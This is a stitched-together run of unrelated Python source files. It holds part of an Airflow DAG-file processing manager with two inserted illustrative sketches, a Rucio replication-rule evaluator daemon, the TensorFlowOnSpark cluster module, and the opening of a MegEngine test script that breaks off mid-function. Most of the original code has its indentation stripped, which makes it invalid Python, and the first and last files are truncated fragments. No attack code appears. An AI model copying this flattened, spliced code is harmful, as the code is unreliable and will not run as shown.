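# location (the real code additionally filters members with might_contain_dag):
import os
import zipfile

def expand_zip_members(fileloc):
    if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
        with zipfile.ZipFile(fileloc) as z:
            return [os.path.join(fileloc, info.filename) for info in z.infolist()]
    return [fileloc]
# --- end sketch ---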
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime (index 5 of each row). (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration.total_seconds() if stat and stat.last_duration else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
last_duration = last_finish_time - processor.start_time
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=last_duration,
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(
self.waitables.keys() - [self._direct_scheduler_conn], timeout=0
)
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processors, i.e. processors with the same file path
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
try:
files_with_mtime[file_path] = os.path.getmtime(file_path)
except FileNotFoundError:
self.log.warning("Skipping processing of missing file: %s", file_path)
continue
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# sets of files. Since we set the seed, the sort order will remain the same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
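# --- Illustrative sketch (not part of the original file) ---
# The three file_parsing_sort_mode behaviours used above, in miniature
# (hostname is a placeholder argument):
import random

def order_files(paths, mode, mtimes=None, hostname="scheduler-1"):
    if mode == "modified_time":
        return sorted(paths, key=lambda p: mtimes[p], reverse=True)
    if mode == "alphabetical":
        return sorted(paths)
    if mode == "random_seeded_by_host":
        paths = list(paths)
        random.Random(hostname).shuffle(paths)  # seeded: stable per host
        return paths
    raise ValueError(mode)

assert order_files(["b.py", "a.py"], "alphabetical") == ["a.py", "b.py"]
assert order_files(["a.py", "b.py"], "modified_time", mtimes={"a.py": 1, "b.py": 2}) == ["b.py", "a.py"]
# --- end sketch ---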
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
processors_to_remove = []
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
# Clean up processor references
self.waitables.pop(processor.waitable_handle)
processors_to_remove.append(file_path)
# Clean up `self._processors` after iterating over it
for proc in processors_to_remove:
self._processors.pop(proc)
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
evaluator.py | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2017
# - Mario Lassnig <mario.lassnig@cern.ch>, 2013
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
#
# PY3K COMPATIBLE
"""
Judge-Evaluator is a daemon to re-evaluate and execute replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from datetime import datetime, timedelta
from re import match
from random import randint
from six import iteritems
from sqlalchemy.exc import DatabaseError
from sqlalchemy.orm.exc import FlushError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, DataIdentifierNotFound, ReplicationRuleCreationTemporaryFailed
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import re_evaluate_did, get_updated_dids, delete_updated_did
from rucio.core.monitor import record_counter
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def re_evaluator(once=False):
"""
Main loop to check for dids requiring re-evaluation.
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_dids = {} # {(scope, name): datetime}
# Make an initial heartbeat so that all judge-evaluators have the correct worker number on the next try
live(executable='rucio-judge-evaluator', hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-evaluator', hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time() # NOQA
# Refresh paused dids
paused_dids = dict((k, v) for k, v in iteritems(paused_dids) if datetime.utcnow() < v)
# Select a bunch of dids for re-evaluation for this worker
dids = get_updated_dids(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=100,
blacklisted_dids=[key for key in paused_dids])
logging.debug('re_evaluator[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(dids)))
# If the list is empty, send the worker to sleep
if not dids and not once:
logging.debug('re_evaluator[%s/%s] did not get any work (paused_dids=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_dids))))
graceful_stop.wait(30)
else:
done_dids = {}
for did in dids:
if graceful_stop.is_set():
break
# Check if this did has already been operated on
if '%s:%s' % (did.scope, did.name) in done_dids:
if did.rule_evaluation_action in done_dids['%s:%s' % (did.scope, did.name)]:
logging.debug('re_evaluator[%s/%s]: evaluation of %s:%s already done' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
delete_updated_did(id=did.id)
continue
else:
done_dids['%s:%s' % (did.scope, did.name)] = []
try:
start_time = time.time()
re_evaluate_did(scope=did.scope, name=did.name, rule_evaluation_action=did.rule_evaluation_action)
logging.debug('re_evaluator[%s/%s]: evaluation of %s:%s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name, time.time() - start_time))
delete_updated_did(id=did.id)
done_dids['%s:%s' % (did.scope, did.name)].append(did.rule_evaluation_action)
except DataIdentifierNotFound:
delete_updated_did(id=did.id)
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_dids[(did.scope, did.name)] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logging.warning('re_evaluator[%s/%s]: Locks detected for %s:%s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except ReplicationRuleCreationTemporaryFailed as e:
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
logging.warning('re_evaluator[%s/%s]: Replica Creation temporary failed, retrying later for %s:%s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
except FlushError as e:
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
logging.warning('re_evaluator[%s/%s]: Flush error for %s:%s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-evaluator', hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Eval threads.
"""
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-evaluator', hostname=hostname)
if once:
re_evaluator(once)
else:
logging.info('Evaluator starting %s threads' % str(threads))
threads = [threading.Thread(target=re_evaluator, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
TFCluster.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the TensorFlow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = []
for i in range(num_epochs):
rdds.append(dataRDD)
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
if node['job_name'] == 'ps':
ps_list.append(node)
else:
worker_list.append(node)
if ssc is not None:
# Spark Streaming
done = False
while not done:
done = ssc.awaitTerminationOrTimeout(1)
if not done and self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
done = done or self.server.done
else:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
if self.input_mode == InputMode.TENSORFLOW:
count = 0
done = False
while not done:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) > 0:
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
done = (count >= 3)
time.sleep(5)
else:
done = True
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
done = False
while not done:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""Utility function to get the Tensorboard URL"""
tb_url = None
for node in self.cluster_info:
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
return tb_url
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes locally on the driver instead of on the Spark executors; this helps maximize computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
assert num_ps < num_executors
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
cluster_template['worker'] = range(num_ps, num_executors)
logging.info("worker node range %s, ps node range %s" % (cluster_template['worker'], cluster_template['ps']))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as a daemon thread so that, in Spark mode, the main thread can exit
# even if the feeder Spark stage fails and cannot perform an explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, ppid), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'],node['ppid'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, ppid={1}). Please ensure that (1) the number of executors >= number of TensorFlow nodes, (2) the number of tasks per executors == 1, and (3) TFCluster.shutdown() is successfully invoked when done.".format(node_id[0], node_id[1]))
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
test.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import multiprocessing as mp
import time
import megengine as mge
import megengine.data as data
import megengine.data.transform as T
import megengine.distributed as dist
import megengine.functional as F
import megengine.jit as jit
import model as M
logger = mge.get_logger(__name__)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--arch", default="shufflenet_v2_x1_0", type=str)
parser.add_argument("-d", "--data", default=None, type=str)
parser.add_argument("-m", "--model", default=None, type=str)
parser.add_argument("-n", "--ngpus", default=None, type=int)
parser.add_argument("-w", "--workers", default=4, type=int)
parser.add_argument("--report-freq", default=50, type=int)
args = parser.parse_args()
world_size = mge.get_device_count("gpu") if args.ngpus is None else args.ngpus
if world_size > 1:
# start distributed training, dispatch sub-processes
mp.set_start_method("spawn")
processes = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, world_size, args))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
worker(0, 1, args)
def worker(rank, world_size, args):
if world_size > 1:
# Initialize distributed process group
logger.info("init distributed process group {} / {}".format(rank, world_size))
dist.init_process_group(
master_ip="localhost",
master_port=23456,
world_size=world_size,
rank=rank,
dev=rank,
)
model = getattr(M, args.arch)(pretrained=(args.model is None))
if args.model:
logger.info("load weights from %s", args.model)
model.load_state_dict(mge.load(args.model))
@jit.trace(symbolic=True)
def valid_func(image, label):
model.eval()
logits = model(image)
